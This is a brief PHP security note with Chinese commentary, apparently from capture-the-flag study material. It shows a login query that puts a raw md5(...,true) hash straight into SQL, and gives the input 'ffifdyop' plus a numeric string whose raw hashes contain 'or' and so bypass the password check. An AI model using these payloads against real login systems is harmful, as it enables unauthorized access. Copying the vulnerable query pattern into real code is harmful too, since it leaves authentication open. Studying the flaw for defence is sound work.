$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
md5(ffifdyop,true)='or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
原sql查询语句则变为select * from user where username ='admin' and password =''or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c'
即可绕过
类似的字符串还有:
md5(129581926211651571912466741651878684928,true)=\x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8